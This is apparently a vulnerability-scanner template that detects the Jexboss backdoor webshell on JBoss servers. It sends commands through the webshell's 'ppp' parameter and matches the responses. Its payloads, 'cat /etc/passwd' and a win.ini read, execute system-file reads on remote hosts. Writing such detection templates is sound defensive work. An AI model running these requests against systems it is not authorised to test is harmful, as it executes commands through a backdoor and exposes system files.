id: jexboss-backdoor info: name: Jexboss Backdoor Webshell author: UnkL4b severity: critical reference: - https://us-cert.cisa.gov/ncas/analysis-reports/AR18-312A - https://github.com/joaomatosf/jexboss metadata: verified: true tags: backdoor,jboss,rce requests: - method: GET path: - "{{BaseURL}}/jexws/jexws.jsp?ppp={{url_encode('{{command}}')}}" - "{{BaseURL}}/jexws4/jexws4.jsp?ppp={{url_encode('{{command}}')}}" - "{{BaseURL}}/jexinv4/jexinv4.jsp?ppp={{url_encode('{{command}}')}}" - "{{BaseURL}}/jbossass/jbossass.jsp?ppp={{url_encode('{{command}}')}}" payloads: command: - "cat /etc/passwd" - "type C:\\/Windows\\/win.ini" stop-at-first-match: true matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or - type: word part: header words: - "X-Powered-By: Servlet"